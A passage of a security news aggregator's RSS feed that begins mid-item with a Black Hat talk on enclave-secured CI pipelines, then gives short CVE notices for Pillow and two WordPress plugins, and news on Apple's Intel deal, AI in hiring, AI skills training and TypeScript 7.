<guid isPermaLink="true">https://tsecurity.de/de/3662082/it-security-video/black-hat-europe-2025-bootstrapping-trust-from-isolated-build-machines-to-enclaved-ci-pipelines/</guid>
<pubDate>Sat, 11 Jul 2026 17:33:03 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Black Hat - Bewertung: 2x - Views:16 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/V411Vadty38?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>This session presents a production-ready approach to securing CI build pipelines against compromised infrastructure by anchoring trust in a physically isolated build machine and leveraging enclave-based builders. The isolated machine compiles and signs a minimal enclave image, which becomes the only entity allowed to build software artifacts in the cloud. The builder enclave image runs inside AWS Nitro Enclaves and enforces strict policy checks such as requiring signed commit hashes before proceeding. Remote attestation is used to verify the AWS Nitro enclave's (the builder) integrity by an Intel SGX enclave verifier before provisioning the build secret, with the SGX enclave serving as a root of trust by encrypting its database with the processor's sealing key.<br />
<br />
We'll detail the threat model, including attackers with SSH or root on CI runners, and walk through a complete enclave build pipeline, showing how trust is rooted in the isolated, air-gapped machine and propagated via the SGX enclave to the Nitro enclave builder. The session includes a demo of a real-world implementation that protects production infrastructure from build tampering and secret exfiltration, even under active adversary conditions.<br />
<br />
Attendees will learn how to design CI pipelines with isolation guarantees similar to air gapped machines but with the build and deployment velocity they are used to in modern cloud environments, integrate enclave attestation into automated builds, and establish a root of trust for critical workloads.<br />
<br />
By: <br />
Ben Liderman  |  System Architect, Fireblocks<br />
Maayan Keshet  |  System Architect, Fireblocks<br />
<br />
https://blackhat.com/eu-25/briefings/schedule/?#bootstrapping-trust-from-isolated-build-machines-to-enclaved-ci-pipelines-49023<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-55798 | Pillow up to 12.2.0 Command Builder WindowsViewer.get_command os command injection (Nessus ID 326367)]]></title>
<description><![CDATA[A vulnerability categorized as critical has been discovered in Pillow up to 12.2.0. Affected is the function WindowsViewer.get_command of the component Command Builder. Such manipulation leads to os command injection.

This vulnerability is documented as CVE-2026-55798. The attack can be executed...]]></description>
<link>https://tsecurity.de/de/3661940/sicherheitsluecken/cve-2026-55798-pillow-up-to-1220-command-builder-windowsviewergetcommand-os-command-injection-nessus-id-326367/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3661940/sicherheitsluecken/cve-2026-55798-pillow-up-to-1220-command-builder-windowsviewergetcommand-os-command-injection-nessus-id-326367/</guid>
<pubDate>Sat, 11 Jul 2026 15:53:22 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability categorized as <a href="https://vuldb.com/kb/risk">critical</a> has been discovered in <a href="https://vuldb.com/product/pillow">Pillow up to 12.2.0</a>. Affected is the function <code>WindowsViewer.get_command</code> of the component <em>Command Builder</em>. Such manipulation leads to os command injection.

This vulnerability is documented as <a href="https://vuldb.com/cve/CVE-2026-55798">CVE-2026-55798</a>. The attack can be executed remotely. There is not any exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Avoided Semiconductor Tariffs Last Year Thanks To Intel Chip Deal]]></title>
<description><![CDATA[A recent report explains how Apple avoided semiconductor tariffs last year thanks to an Intel chip deal. Tim Cook traveled to Washington last summer to stop a 100 percent tax on imported computer parts. A tax like that would make every device much more expensive to build.



The company secured a...]]></description>
<link>https://tsecurity.de/de/3661882/ios-mac-os/apple-avoided-semiconductor-tariffs-last-year-thanks-to-intel-chip-deal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3661882/ios-mac-os/apple-avoided-semiconductor-tariffs-last-year-thanks-to-intel-chip-deal/</guid>
<pubDate>Sat, 11 Jul 2026 15:08:56 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A recent report explains how Apple avoided semiconductor tariffs last year thanks to an Intel chip deal. Tim Cook traveled to Washington last summer to stop a 100 percent tax on imported computer parts. A tax like that would make every device much more expensive to build.



The company secured a pass on these fees by agreeing to spend money inside the country. That big agreement heavily involved another major name in technology.



The government pushed the tech giant to support local manufacturing



During the talks, government officials brought up Intel. The administration made it clear that helping this American brand was the main way to secure the tax break. Because of this push, we now know that Apple avoided semiconductor tariffs last year thanks to the Intel chip deal.



The plan worked for both sides. The government recently shared on social media that Apple will start using parts made by Intel inside its popular devices. This public news sent the stock price for the chip builder to a record high.



The brand plans to use these local parts inside upcoming Mac computers and future iPhone models. Before this report came out, nobody knew that the talks about taxes were connected to this manufacturing partnership.



Building parts locally keeps the final price lower for buyers



The main goal of the tax rule was to make large businesses build things in America. By choosing to work with a local partner, the company did not have to pay extra import fees on its part. This meant it could keep the final prices normal for people buying a new phone or laptop.



Even with this good news, the company still faced some financial problems later because of a worldwide shortage of memory parts. However, solving the tax issue was a big win.



It shows how much power the government has over where technology brands choose to build things. By working together, the brand protected its profit while giving a boost to a local factory.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-11977 | Happyforms Plugin up to 1.26.12 on WordPress Form Builder happyforms_get_form_partial file inclusion (EUVD-2025-210450)]]></title>
<description><![CDATA[A vulnerability was found in Happyforms Plugin up to 1.26.12 on WordPress and classified as problematic. Affected by this issue is the function happyforms_get_form_partial of the component Form Builder. Such manipulation leads to file inclusion.

This vulnerability is traded as CVE-2025-11977. Th...]]></description>
<link>https://tsecurity.de/de/3659851/sicherheitsluecken/cve-2025-11977-happyforms-plugin-up-to-12612-on-wordpress-form-builder-happyformsgetformpartial-file-inclusion-euvd-2025-210450/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3659851/sicherheitsluecken/cve-2025-11977-happyforms-plugin-up-to-12612-on-wordpress-form-builder-happyformsgetformpartial-file-inclusion-euvd-2025-210450/</guid>
<pubDate>Fri, 10 Jul 2026 15:25:02 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/happyforms_plugin">Happyforms Plugin up to 1.26.12</a> on WordPress and classified as <a href="https://vuldb.com/kb/risk">problematic</a>. Affected by this issue is the function <code>happyforms_get_form_partial</code> of the component <em>Form Builder</em>. Such manipulation leads to file inclusion.

This vulnerability is traded as <a href="https://vuldb.com/cve/CVE-2025-11977">CVE-2025-11977</a>. The attack may be launched remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[AI’s potential to infect the hiring process with bias]]></title>
<description><![CDATA[You’ll be hard pressed to find an area of corporate America where AI hasn’t found a place, and that includes the tech hiring process. A survey from MyPerfectResume found that 73% of employers say they use AI in hiring decisions, while 52% use it for decisions around restructuring and role plannin...]]></description>
<link>https://tsecurity.de/de/3659261/it-nachrichten/ais-potential-to-infect-the-hiring-process-with-bias/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3659261/it-nachrichten/ais-potential-to-infect-the-hiring-process-with-bias/</guid>
<pubDate>Fri, 10 Jul 2026 11:32:30 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>You’ll be hard pressed to find an area of corporate America where AI hasn’t found a place, and that includes the tech hiring process. A <a href="https://www.myperfectresume.com/career-center/careers/basics/ai-in-hiring-layoffs" rel="nofollow">survey from MyPerfectResume</a> found that 73% of employers say they use AI in hiring decisions, while 52% use it for decisions around restructuring and role planning.</p>



<p>On the other side, candidates are also increasingly relying on AI, with 52% of current job seekers reporting they use AI to help them in their job searches to refine submission materials (85%) and prepare for interviews (73%), according to <a href="https://www.sap.com/documents/2026/05/ccd1609f-507f-0010-bca6-c68f7e60039b.html" rel="nofollow">data from SAP</a>.</p>



<p>“Technology can help employers be more efficient, but hiring decisions still benefit from human judgment, especially when a candidate’s experience requires context that automated screening may not understand,” says Jasmine Escalera, career expert at online career and résumé builder Zety.</p>



<p>It’s clear AI is an integral part of the hiring process, and organizations need to prepare a strategy for what that looks like moving forward in terms of hiring bias, transparency, and striking the right balance of human effort and AI assistance.</p>



<h2 class="wp-block-heading">Recognizing the warning signs</h2>



<p>AI has the promise of bringing efficiency in hiring for both job seekers and employees, but if organizations aren’t careful, an overreliance on AI technology can lead to unintended consequences. Further MyPerfectResume data also reveals 65% of respondents say AI often automatically rejects applicants before a person sees them, and 14% say AI rejects more than half of applicants outright.</p>



<p>Additionally, 47% say they feel AI has filtered out candidates who would’ve otherwise advanced in the process. And 51% say they use AI to flag risky candidates, such as people who might be viewed as job-hoppers or who have employment gaps.</p>



<p>Flagging risky candidates and eliminating them before a human can look at their résumé can filter out candidates with experience that tells a more complex story than an algorithm is designed to interpret, says Escalera. Candidates re-entering the workforce after time off, for example, may have valuable skills that don’t fit neatly into automated screening criteria, she adds.</p>



<p>Similarly, there’s concern AI will reject a professional who wants to change industries, or has qualifications that don’t  perfectly reflect the language in a job description before a human has a chance to look.</p>



<p>Laurie Cure, CEO of consulting firm Innovative Connections, says she’s seen instances where AI has eliminated highly qualified yet nervous candidates who take more time than what the AI allocated to answer a question, or candidates may simply use a different language than the AI is programmed to look for, causing them to not be recommended to progress in the process.</p>



<p>She’s also seen where AI might use historical data to determine patterns of a successful employee, identifying certain schools, work histories, tenure, or other characteristics that, while not inherently bias, perpetuates the bias that accurate correlations exist between these elements, when they often don’t. Organizations need to ensure that humans remain a part of these processes, Cure adds, where they can bring context, intuition, nuance, and an ability to identify potential in a candidate that AI can’t replicate.</p>



<p>“I think we’re allowing AI to become the process instead of allowing it to support the process in ways that makes hiring better,” she says.</p>



<h2 class="wp-block-heading">An emphasis on accuracy over speed</h2>



<p>Cure says a major problem for most companies is that the balance is off, with companies using AI for the majority, if not all, of résumé screening rather than as a complement to human efforts. Organizations that simply implement AI to speed up different parts of the hiring process, without taking time to consider if a process stands to benefit from AI, run the risk of introducing bias.</p>



<p>“While this allows for managing high volumes of applicants, and provides greater degrees of consistency in applying job criteria, it likely misses many good candidates,” she says. “The human element needs to be highly active in developing job requirements so they’re not too narrow. Organizations need to look at how they ask AI to do its work, so be cautious how you frame the screening or other criteria.”</p>



<p>Ultimately, AI isn’t a tool to be implemented and forgotten, or one that should be viewed simply as a path to efficiency since many processes still benefit from and require a human touch. It’s important to conduct audits of AI processes in hiring, and to remember that the use of AI doesn’t eliminate the legal or ethical obligations an organization has for equal employment, says Cure, making the balance between human and AI even more important.</p>



<h2 class="wp-block-heading">AI transparency and fostering candidate trust</h2>



<p>AI has also introduced an element of mistrust into hiring on both sides, where employers can’t be sure candidates haven’t relied on AI the same way candidates aren’t always sure exactly how AI is being used in the hiring process. Candidates are aware that employers are implementing AI, but they’re often unsure of the extent it’s being used and when to expect to interact with humans.</p>



<p>“That lack of clarity can create skepticism and frustration, particularly in a job market that already feels highly competitive,” says Escalera. “The goal shouldn’t be to convince candidates that AI isn’t being used, but to help them understand how technology supports decisions rather than replaces the human judgment behind them.”     </p>



<p>Cure recommends organizations start with a process map that outlines every step of an organization’s hiring process to help visualize where AI is beneficial and which processes still require human intervention. Companies can shift to relying too heavily on AI or they may become too dependent on human effort, when that effort could be put toward more important tasks.</p>



<p>“Humans bring an understanding of a person’s broader history, and the ability to detect when a candidate has potential to grow into the role,” she says. “People can see non-traditional career paths and motivations more distinctly than AI. Yet AI brings consistency, efficiency, criteria standardization, and a level of objectivity the process benefits from. If we effectively blend these two at the right points in the process, hiring is enhanced, not diminished.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[내부 육성 vs 외부 영입…AI 인재 전쟁에서 앞서가는 기업의 선택은?]]></title>
<description><![CDATA[AI를 성공적으로 도입하는 데 가장 중요한 요소는 이제 어떤 AI 도구를 도입했느냐가 아니라 이를 활용할 수 있는 인재를 얼마나 확보했느냐로 옮겨가고 있다. 이에 따라 IT 리더들은 기존 직원의 AI 역량을 강화해야 한다는 압박을 받고 있다.



AI 역량은 현재 가장 수요가 높으면서도 채용이 가장 어려운 분야다. 이에 따라 많은 IT 리더와 경영진은 AI 도구를 개발하는 IT 전문가뿐 아니라 이를 업무에 활용할 일반 직원까지 포함하는 전사적인 AI 교육 프로그램을 확대하고 있다.



드브라이대학교(DeVry Univers...]]></description>
<link>https://tsecurity.de/de/3658807/it-nachrichten/vs-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3658807/it-nachrichten/vs-ai/</guid>
<pubDate>Fri, 10 Jul 2026 07:32:41 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>AI를 성공적으로 도입하는 데 가장 중요한 요소는 이제 어떤 AI 도구를 도입했느냐가 아니라 이를 활용할 수 있는 인재를 얼마나 확보했느냐로 옮겨가고 있다. 이에 따라 IT 리더들은 기존 직원의 AI 역량을 강화해야 한다는 압박을 받고 있다.</p>



<p>AI 역량은 현재 가장 수요가 높으면서도 채용이 가장 어려운 분야다. 이에 따라 많은 IT 리더와 경영진은 AI 도구를 개발하는 IT 전문가뿐 아니라 이를 업무에 활용할 일반 직원까지 포함하는 전사적인 AI 교육 프로그램을 확대하고 있다.</p>



<p>드브라이대학교(DeVry University)의 CIO <a href="https://www.devry.edu/newsroom/administration/chris-campbell.html" target="_blank" rel="nofollow">크리스 캠벨</a>은 “현명한 기업이라면 직원들의 AI 역량 강화에 과감히 투자해야 한다”라고 말했다.</p>



<p>그는 “변화의 속도가 너무 빨라 외부 채용에만 의존하는 것은 현실적이지 않다”라며 “기존 직원 전반에 걸쳐 AI 역량을 키우는 조직이 제한된 전문가를 확보하기 위해 경쟁하는 기업보다 더 큰 경쟁우위를 확보할 것”이라고 설명했다.</p>



<p>캠벨은 AI를 성공적으로 도입하기 위한 핵심 요소도 시간이 지나면서 달라졌다고 진단했다.</p>



<p>그는 “초기에는 모두가 AI 도구에 접근할 수 있는지가 가장 큰 관심사였다”라며 “하지만 이제 AI 도구는 어디에나 있다. 지금 기업들이 어려움을 겪는 부분은 AI를 실제 비즈니스 문제 해결에 어떻게 적용하고, 기존 업무 프로세스에 자연스럽게 통합할 것인지다”라고 말했다.</p>



<p>캠벨은 드브라이대학교에서 가장 적극적으로 AI를 활용하는 직원 상당수가 전통적인 AI 전문가 출신이 아니라 소프트웨어 엔지니어링, 비즈니스 분석, 사이버보안, 프로젝트 관리, 운영 분야 출신이라고 설명했다.</p>



<p>그는 “이들은 비즈니스를 깊이 이해하고 문제 지점을 정확히 파악하며 AI가 가치를 창출할 수 있는 영역을 찾아낼 수 있다”라며 “이러한 역량은 특정 AI 모델이나 도구에 대한 깊은 전문성보다 더 중요한 경우가 많다”라고 말했다.</p>



<p>숙련된 AI 인재는 시장에서 확보하기가 매우 어렵다. 특히 IT 리더들이 AI 프로젝트를 실험 단계에서 실제 운영 환경까지 성공적으로 전환한 경험을 갖춘 인재를 찾을 경우 그 어려움은 더욱 커진다.</p>



<p>캠벨은 “모든 기업이 대규모 AI 전문가 조직을 구축할 필요는 없다”라며 “많은 경우 AI 도입을 가장 효과적으로 이끌 수 있는 인재는 이미 조직 내부에 있다”라고 말했다.</p>



<h2 class="wp-block-heading">AI 빌더 문화 정착 위한 역량 강화</h2>



<p>글로벌 회계·컨설팅 기업 KPMG는 전 직원을 대상으로 AI 교육을 확대하며 AI 인재 부족 문제에 대응하고 있다고 KPMG 세무 부문 부회장 <a href="https://www.linkedin.com/in/rema-serafi/" target="_blank" rel="nofollow">레마 세라피</a>가 밝혔다. 그는 2026년 기업들이 직면한 가장 큰 AI 과제는 기술 부족이 아니라 인재 부족이라고 진단했다.</p>



<p>CIO.com이 공개한 <a href="https://us.resources.cio.com/resources/state-of-the-cio/" target="_blank" rel="nofollow">‘CIO 현황 2026(State of the CIO)’ 보고서</a>에 따르면 CIO의 40%는 AI 전략 추진의 가장 큰 장애물 가운데 하나로 내부 인재 부족을 꼽았다.</p>



<p>이에 대응하기 위해 KPMG는 6주 과정의 AI 교육 프로그램을 시범 운영하고 있다. 목표는 모든 직원이 직접 AI 도구를 구축하고 활용할 수 있도록 하는 것이다.</p>



<p>세라피는 이 프로그램이 사내 AI 도구 개발의 기반이 되는 파이썬과 다양한 핵심 기술을 교육한다고 설명했다.</p>



<p>또한 KPMG는 AI 파워 유저(AI Power User), 메이커(Maker), 빌더(Builder) 등 세 가지 역할의 직원이 긴밀하게 협업할 수 있도록 조직 구조도 개편했다.</p>



<p>세라피는 “모든 직원이 우리 AI 도구를 사용할 수 있게 될 것이며, 모두가 AI 파워 유저가 될 것”이라며 “입사 당시 AI 역량이 없었거나 엔지니어 또는 기술 전문가 출신이 아니더라도 배우려는 의지만 있다면 AI 도구를 개발할 수 있도록 인증도 제공할 계획”이라고 말했다.</p>



<p>그는 직원 교육 없이 최고 수준의 AI 도구만 도입하는 것은 F1 경주용 차량을 구입한 뒤 전문 드라이버를 고용하지 않는 것과 같다고 비유했다.</p>



<p>세라피는 “AI를 제대로 활용할 수 있는 전문가가 없다면 기업은 AI가 제공하는 가치를 최대한 끌어낼 수 없다”라고 말했다.</p>



<p>KPMG가 텍사스대학교와 공동으로 진행한 연구에 따르면 AI를 정기적으로 사용하는 직원은 더 높은 품질의 업무 성과를 내고 스트레스도 덜 받는 것으로 나타났다. 세라피는 AI를 능숙하게 활용하는 직원일수록 경력 발전 속도도 더 빨라질 것으로 내다봤다.</p>



<p>다만 AI 기술이 매우 빠르게 발전하는 만큼 교육 프로그램도 이에 맞춰 지속적으로 진화해야 하는 과제를 안고 있다고 지적했다.</p>



<p>세라피는 “직무 자체가 매우 짧은 기간 안에 변화하고 있다”라며 “과거에는 전통적인 엔지니어가 AI를 활용했다면 이제는 고객 업무에서 AI를 안내하고, 설계하며, 활용 방향을 제시하는 전문가가 늘어나고 있다”라고 말했다.</p>



<h2 class="wp-block-heading">“재교육은 선택이 아니라 유일한 현실적 해법”</h2>



<p>에이전틱 AI 코딩 스타트업 코더닷컴(koder.com)의 설립자 겸 CEO <a href="https://www.linkedin.com/in/elmerm/" target="_blank" rel="nofollow">엘머 모랄레스</a> 역시 전사적인 AI 교육의 필요성을 강조했다. 그는 대부분의 기업에서 외부 AI 인재를 확보하는 일이 매우 어려워졌다고 진단했다.</p>



<p>모랄레스는 “재교육은 더 이상 선택 사항이 아니다”라며 “대부분의 조직이 앞으로 나아갈 수 있는 유일한 현실적 해법이다. 외부 인재 시장은 모든 기업이 동시에 필요로 하는 AI 인력을 공급할 수 없으며, 대학 교육이 이를 따라잡기를 기다리는 것도 전략이 될 수 없다”라고 말했다.</p>



<p>그는 AI에 성공하는 기업은 역량 강화를 단순한 인사(HR) 프로그램이 아니라 핵심 투자로 인식한다고 설명했다.</p>



<p>모랄레스는 “현재 AI 혁신을 가로막는 가장 현실적인 한계는 인재 격차”라며 “기업은 최고의 AI 모델과 인프라, 도구를 모두 갖출 수 있지만, 이를 실제 운영 환경에서 제대로 작동하는 시스템으로 연결할 인력이 없다면 아무런 가치도 만들어낼 수 없다”라고 말했다.</p>



<p>그는 IT 리더들에게 기존 엔지니어 조직에서 AI 도입을 이끌 인재를 발굴할 것을 권했다.</p>



<p>모랄레스는 “퇴근 후나 주말에도 개인 프로젝트를 진행하고 새로운 AI 모델을 실험하는 엔지니어들이 이미 조직 안에 있다”라며 “이들에게 필요한 것은 권한과 자원, 그리고 해결해야 할 실제 비즈니스 문제뿐이다. 내가 본 최고의 AI 조직은 외부 채용으로 만들어진 것이 아니라, 적합한 인재가 스스로 나설 수 있는 환경을 조성함으로써 탄생했다”라고 말했다.<br>dl-ciokorea@foundryco.com</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-9253 | loopus Cost Estimation & Payment Forms Builder Plugin up to 10.5.97 Form customerInfos cross site scripting (EUVD-2026-42579)]]></title>
<description><![CDATA[A vulnerability categorized as problematic has been discovered in loopus Cost Estimation & Payment Forms Builder Plugin up to 10.5.97. The affected element is an unknown function of the component Form Handler. The manipulation of the argument customerInfos results in cross site scripting.

This v...]]></description>
<link>https://tsecurity.de/de/3657176/sicherheitsluecken/cve-2026-9253-loopus-cost-estimation-payment-forms-builder-plugin-up-to-10597-form-customerinfos-cross-site-scripting-euvd-2026-42579/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3657176/sicherheitsluecken/cve-2026-9253-loopus-cost-estimation-payment-forms-builder-plugin-up-to-10597-form-customerinfos-cross-site-scripting-euvd-2026-42579/</guid>
<pubDate>Thu, 09 Jul 2026 15:24:57 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability categorized as <a href="https://vuldb.com/kb/risk">problematic</a> has been discovered in <a href="https://vuldb.com/product/loopus:cost_estimation__payment_forms_builder_plugin">loopus Cost Estimation &amp; Payment Forms Builder Plugin up to 10.5.97</a>. The affected element is an unknown function of the component <em>Form Handler</em>. The manipulation of the argument <em>customerInfos</em> results in cross site scripting.

This vulnerability is identified as <a href="https://vuldb.com/cve/CVE-2026-9253">CVE-2026-9253</a>. The attack can be executed remotely. There is not any exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Revving up Microsoft’s 10x faster TypeScript 7]]></title>
<description><![CDATA[It has been a year or so since Microsoft announced its plans to move TypeScript to a new, native runtime based on the Go language. Those first releases were unfinished (you had to compile them yourself) but showed promise, getting close to the expected 10x speed-up. That year has been one of stea...]]></description>
<link>https://tsecurity.de/de/3656432/ai-nachrichten/revving-up-microsofts-10x-faster-typescript-7/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656432/ai-nachrichten/revving-up-microsofts-10x-faster-typescript-7/</guid>
<pubDate>Thu, 09 Jul 2026 11:03:32 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p><a href="https://www.infoworld.com/article/3849654/typescript-gets-go-faster-stripes.html">It has been a year or so</a> since Microsoft announced its plans to move <a href="https://www.infoworld.com/article/2257305/what-is-typescript-strongly-typed-javascript.html" data-type="link" data-id="https://www.infoworld.com/article/2257305/what-is-typescript-strongly-typed-javascript.html">TypeScript</a> to a new, native runtime based on the <a href="https://www.infoworld.com/article/2253031/whats-the-go-language-really-good-for-3.html" data-type="link" data-id="https://www.infoworld.com/article/2253031/whats-the-go-language-really-good-for-3.html">Go language</a>. Those first releases were unfinished (you had to compile them yourself) but showed promise, getting close to the expected 10x speed-up. That year has been one of steady progress, with <a href="https://devblogs.microsoft.com/typescript/announcing-typescript-7-0-rc/">Microsoft recently announcing the delivery of a release candidate build</a>.</p>



<p>This release candidate is ready for use. It installs from npm like previous versions, and like earlier builds it works in much the same way as previous versions of TypeScript, checking types in your code, compiling it to run on ECMAScript-compliant JavaScript engines, and running just about anywhere. In addition, a native preview of the TypeScript language server for <a href="https://www.infoworld.com/article/2335960/what-is-visual-studio-code-microsofts-extensible-code-editor.html" data-type="link" data-id="https://www.infoworld.com/article/2335960/what-is-visual-studio-code-microsofts-extensible-code-editor.html">Visual Studio Code</a> is available to help you write new TypeScript code and guide you through updating existing applications to the new language features.</p>



<p>All you need to do is enable the <a href="https://marketplace.visualstudio.com/items?itemName=TypeScriptTeam.native-preview" data-type="link" data-id="https://marketplace.visualstudio.com/items?itemName=TypeScriptTeam.native-preview">TypeScript 7 extension</a> through the Visual Studio command palette and start coding. There’s a lot of work going on to get the new tooling ready for the final release of TypeScript 7, and new versions of the language server are being released almost daily. It’s certainly popular, too, with nearly half a million downloads at the time of writing.</p>



<h2 class="wp-block-heading">What makes TypeScript 7 so much faster?</h2>



<p>So how is this new TypeScript so much faster? Key to the improvements is a shift to a new native compiler built in Go. This has allowed the team to change how it operates, adding parallelization where possible. In some cases, this isn’t easy, such as when type checking large codebases split across many files.</p>



<p>Here TypeScript spawns a small number of checker workers that run across your codebase. They work independently, so can duplicate the work — though the output will be the same. You can choose your own number of checkers, but the more you use, the more memory and CPU will be required.</p>



<p>Large monorepos with many projects require a similar approach with independent builder workers. You’ll need to balance this with the number of checkers in use, as this can cause significant resource issues.</p>



<p>There are some significant language and configuration changes from TypeScript 5 (TypeScript 6 has the same changes, which makes it a useful tool for experimenting with migrations). It’s well worth reading the release candidate documentation to understand how these will affect your code, as well as using the TypeScript 7 extension for Visual Studio Code to identify where you need to make changes.</p>



<h2 class="wp-block-heading">Working with users to build language tools</h2>



<p>One important aspect to the development of TypeScript 7 has been collaboration with existing users of the language and its tooling, as well as using the existing suite of TypeScript test tools that have been used to evaluate other versions. As this update is primarily a port of existing code, rather than a bottom-up rewrite, the underlying language semantics and structure are the same as those used in the original JavaScript codebase, ensuring that code will quickly port from old to new versions.</p>



<p>A major internal collaborator was the Visual Studio Code team, who have been using TypeScript to develop the familiar cross-platform development tool. It’s an important partnership between tool and language, as VS Code is a key TypeScript development tool, hosting TypeScript’s language server and using its compiler to provide debugging and code completion features.</p>



<p>The <a href="https://code.visualstudio.com/blogs/2026/06/26/iterating-faster-with-ts-7" data-type="link" data-id="https://code.visualstudio.com/blogs/2026/06/26/iterating-faster-with-ts-7">VS Code team published a long blog post</a> detailing how it has been working with the Go-based TypeScript. The team is both helping to develop the language and beginning the process of moving its codebase to the newer, faster, native platform.</p>



<p>How the VS Code team migrated is a useful case study, one that can help you move your TypeScript development more efficiently and with minimal risk. The team began working with extensions, using daily builds of TypeScript to ensure that bugs and issues could be reported as they occurred and would only have a limited impact as fixes could be rolled out quickly. At the same time, the VS Code team began using a preview version of the TypeScript 7 extension for VS Code, which was being built around the new compiler in parallel with its development.</p>



<h2 class="wp-block-heading">Bridging development with TypeScript 6</h2>



<p>The development of <a href="https://devblogs.microsoft.com/typescript/announcing-typescript-6-0/" data-type="link" data-id="https://devblogs.microsoft.com/typescript/announcing-typescript-6-0/">TypeScript 6 as a bridge between TypeScript 5 and TypeScript 7</a> allowed the VS Code team to transition to code that targeted a newer version of ECMAScript and provided more powerful checks. By moving code from TypeScript 5 to TypeScript 6, developers could validate it with what would become TypeScript 7 language features and get speed and performance boosts while doing so (though nowhere near what TypeScript 7 promised). By completing this first migration of the VS Code codebase, it was possible for developers to be confident that they were ready to shift to the Go-based version when it shipped.</p>



<p>The parallel development of the new language server and extension ensured that by late 2025 it was possible for VS Code development to shift to TypeScript 7, with TypeScript 6 used as a fallback if there were any issues. Those cases could then be reported back to the TypeScript team and used to prioritize development.</p>



<p>As the platform evolved, the use cases for the VS Code team changed. By early 2026 TypeScript 7 was stable and nearly feature-complete, so the team began to use it to build all of their own built-in extensions. This allowed them to rethink their toolchain, changing the bundler from webpack to the one built into esbuild, giving them another speed up. Once that process was tested and working, they could switch all development to TypeScript 7.</p>



<p>Having such a big project take on TypeScript 7 early reaped big rewards, as the resulting virtuous cycle allowed both VS Code and TypeScript to move forward together, fixing issues as they arose and providing valuable feedback. The results speak for themselves. Type checking the entire VS Code codebase is now 7x faster, with most extensions checked in under a second. The only exception was <a href="https://www.infoworld.com/article/3609013/github-copilot-everything-you-need-to-know.html" data-type="link" data-id="https://www.infoworld.com/article/3609013/github-copilot-everything-you-need-to-know.html">GitHub Copilot</a>, which is almost as big as the editor itself, which type checked in 2.5 seconds.</p>



<p>Compilation has been sped up, dropping from 80 seconds to around 20 seconds. This may not seem a lot, but when you’re compiling and rebuilding and debugging, each change in your code now takes a lot less time. That improves developer productivity and ensures they stay in flow, rather than switching away to check email or Teams each time they start a new build. The same goes for using the language server, where loading the entire project (necessary for error detection and refactoring) now takes 10 seconds rather than a minute.</p>



<p>Lots of little time savings like this add up across a big project and a large team, helping developers stay focused and able to solve problems more effectively. The VS Code blog post notes that it cuts down on coffee runs, which take longer than the load or build that inspire a quick cuppa!</p>



<h2 class="wp-block-heading">Getting ready for TypeScript 7 in your build pipeline</h2>



<p>Microsoft is quick to point out that, while the TypeScript 7.0 release will be production ready, TypeScript 7 won’t have a full programmatic API until the release of TypeScript 7.1. As this won’t be for some time, Microsoft is providing <a href="https://devblogs.microsoft.com/typescript/announcing-typescript-7-0-rc/#running-side-by-side-with-typescript-6.0" data-type="link" data-id="https://devblogs.microsoft.com/typescript/announcing-typescript-7-0-rc/#running-side-by-side-with-typescript-6.0">a way to run TypeScript 7 side-by-side with TypeScript 6</a>.</p>



<p>Installing the <code>@typescript/typescript6</code> compatibility package alongside TypeScript 7 adds a new executable, <code>tsc6</code>, that allows you to modify code that uses the TypeScript 5 API to run using TypeScript 6, by renaming the calls to <code>tsc</code> in your scripts to <code>tsc6</code>. This should allow you to keep building to the latest releases at the same time as starting to experiment with using the new runtime.</p>



<p>It’s not a perfect fix. You do need to do some work to implement npm aliases that allow linters and other low-level tools to work with both versions. You can also provide two different dependencies in your package.json to allow TypeScript 6 (<code>tsc6</code>) and TypeScript 7 (<code>tsc</code>) to run side-by-side. The result is a way to help migrate TypeScript code to the newer platform, delivering more efficient code that runs on a more modern ECMAScript in the meantime.</p>



